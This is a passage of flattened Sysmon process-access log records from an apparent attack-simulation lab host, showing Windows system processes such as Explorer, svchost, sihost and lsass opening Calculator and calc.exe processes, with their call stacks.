Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362268Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.694{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362267Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.694{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362266Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.679{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\TWINAPI.dll+6cd1|C:\Windows\system32\twinui.pcshell.dll+1aa50|C:\Windows\system32\twinui.pcshell.dll+1a252|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362265Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.679{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\TWINAPI.dll+6cd1|C:\Windows\system32\twinui.pcshell.dll+1aa50|C:\Windows\system32\twinui.pcshell.dll+1a252|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362264Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.679{8e433fbf-2a44-6013-0e00-000000001100}71210564C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+2321e|C:\Windows\SYSTEM32\psmserviceexthost.dll+201f5|C:\Windows\SYSTEM32\psmserviceexthost.dll+1e830|C:\Windows\SYSTEM32\psmserviceexthost.dll+1d6ee|C:\Windows\SYSTEM32\psmserviceexthost.dll+264d5|C:\Windows\SYSTEM32\psmserviceexthost.dll+36ee2|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362263Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.663{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7d4e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7ca7|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+299b|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f 10341000x8000000000000000362262Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.663{8e433fbf-337a-6013-7402-000000001100}62681424C:\Windows\system32\sihost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\usermgrcli.dll+112d|C:\Windows\system32\activationmanager.dll+f9dd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e 10341000x8000000000000000362261Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.663{8e433fbf-2a44-6013-0e00-000000001100}71210564C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+2321e|C:\Windows\SYSTEM32\psmserviceexthost.dll+201f5|C:\Windows\SYSTEM32\psmserviceexthost.dll+1e830|C:\Windows\SYSTEM32\psmserviceexthost.dll+1d6ee|C:\Windows\SYSTEM32\psmserviceexthost.dll+264d5|C:\Windows\SYSTEM32\psmserviceexthost.dll+36ee2|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362260Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.663{8e433fbf-2a44-6013-0e00-000000001100}71210564C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+33e55|C:\Windows\SYSTEM32\psmserviceexthost.dll+11fea|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362259Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.663{8e433fbf-337b-6013-8402-000000001100}16561560C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+4988e|C:\Windows\system32\twinui.pcshell.dll+4b3da|C:\Windows\system32\twinui.pcshell.dll+38af2|C:\Windows\system32\twinui.pcshell.dll+6fe9c|C:\Windows\System32\shcore.dll+b0b7|C:\Windows\system32\twinui.pcshell.dll+1dc45|C:\Windows\system32\twinui.pcshell.dll+623cb|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931 10341000x8000000000000000362258Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.663{8e433fbf-337a-6013-7402-000000001100}62685048C:\Windows\system32\sihost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\activationmanager.dll+cd0b|C:\Windows\system32\activationmanager.dll+c217|C:\Windows\system32\activationmanager.dll+bd76|C:\Windows\system32\activationmanager.dll+129de|C:\Windows\system32\activationmanager.dll+25a83|C:\Windows\system32\activationmanager.dll+9593|C:\Windows\system32\activationmanager.dll+54b7|C:\Windows\system32\activationmanager.dll+4591|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8 10341000x8000000000000000362257Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.663{8e433fbf-2a44-6013-0e00-000000001100}7124808C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+28d18|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362256Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.663{8e433fbf-2a44-6013-0e00-000000001100}7124808C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+37ea0|C:\Windows\SYSTEM32\psmserviceexthost.dll+38b65|C:\Windows\SYSTEM32\psmserviceexthost.dll+25e9b|C:\Windows\SYSTEM32\psmserviceexthost.dll+2948a|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362255Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.663{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+2321e|C:\Windows\SYSTEM32\psmserviceexthost.dll+201f5|C:\Windows\SYSTEM32\psmserviceexthost.dll+1e830|C:\Windows\SYSTEM32\psmserviceexthost.dll+1d6ee|C:\Windows\SYSTEM32\psmserviceexthost.dll+264d5|C:\Windows\SYSTEM32\psmserviceexthost.dll+36ee2|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362254Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.616{8e433fbf-2a44-6013-0c00-000000001100}9804888C:\Windows\system32\lsass.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\lsasrv.dll+1792a|C:\Windows\system32\lsasrv.dll+184bf|C:\Windows\system32\lsasrv.dll+17783|C:\Windows\SYSTEM32\SspiSrv.dll+1a72|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362253Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.616{8e433fbf-2a44-6013-0c00-000000001100}9804888C:\Windows\system32\lsass.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\system32\lsasrv.dll+176ae|C:\Windows\SYSTEM32\SspiSrv.dll+1a72|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362252Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.616{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362251Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.616{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362250Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.616{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362249Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.616{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000362248Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.616{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b903-000000001100}9296C:\Windows\SysWOW64\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+13509|C:\Windows\System32\RPCRT4.dll+382b3|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000362247Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 